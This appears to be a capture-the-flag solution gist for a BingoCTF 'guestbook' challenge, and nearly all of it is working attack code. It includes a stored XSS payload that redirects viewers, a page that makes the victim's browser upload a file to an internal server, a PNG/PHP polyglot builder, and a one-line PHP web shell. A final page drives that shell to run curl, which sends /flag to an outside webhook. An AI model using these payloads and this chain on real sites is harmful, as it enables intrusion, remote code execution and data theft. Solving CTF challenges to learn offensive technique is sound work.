- Generate the payload with gen_payload.php
- Put exploit1.html, exploit2.html, and the generated payload.bin on your web server
- Post the following to the guestbook (it closes the textarea, and the injected script redirects any viewer whose URL does not contain web1.bingo to your exploit page):
</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
- Fix the filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
- Post the same payload again, this time pointing at exploit2.html:
</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit2.html`</script><textarea>
Last active March 17, 2021 19:13
Gist: st98/98a05b400bf7e45b3c31c9019daf5035
BingoCTF - guestbook
base.php:
<?php shell_exec($_GET['cmd']); // minimal web shell: runs the value of ?cmd= on the server (output is not needed, exploit2.html exfiltrates with curl)
exploit1.html:
<!-- Cross-site upload: the form targets http://private/upload.php, so the
     victim's browser submits it from its own network position with its own cookies. -->
<form method="POST" enctype="multipart/form-data" action="http://private/upload.php" id="form">
<input type="text" name="submit" value="ok">
<input type="file" name="fileToUpload" id="up">
<input type="submit" id="go">
</form>
<script>
(async () => {
  const form = document.getElementById('form');
  const up = document.getElementById('up');
  // payload.bin is served from the same (attacker-controlled) host as this page.
  const content = await fetch('/payload.bin').then(resp => resp.blob());
  // Declare the upload as a PNG so a Content-Type check passes.
  const blob = new Blob([content], { type: "image/png"});
  // Random name to avoid collisions; the .php extension is what gets the file executed.
  const filename = 'payload_' + Math.random() + '.php';
  // Record the chosen name on the attacker's server; exploit2.html needs it.
  await fetch('/log.php?filename=' + filename);
  const file = new File([blob], filename);
  // A file input cannot be assigned a File directly; go through a DataTransfer.
  const dt = new DataTransfer();
  dt.items.add(file);
  const list = dt.files;
  up.files = list;
  const go = document.getElementById('go');
  go.click();
})();
</script>
exploit2.html:
<script>
// Hit the uploaded web shell (replace the filename with the one recorded by log.php)
// and make the server POST /flag to an attacker-controlled webhook.
location.href = "http://private/uploads/payload_0.6719151792598002.php?cmd=" + encodeURIComponent('curl "https://webhook.site/e9ad957a-4480-44ff-b428-3324b77c15f0" -F a=@/flag');
</script>
gen_payload.php:
<?php
// Build a PNG/PHP polyglot: the first 100 bytes of a real PNG (enough for the
// signature and the IHDR chunk) followed by base.php. The file still starts
// like a PNG, but once stored with a .php name the appended code is executed.
$a = file_get_contents('base.png');
$b = file_get_contents('base.php');
file_put_contents('payload.bin', substr($a, 0, 100) . $b);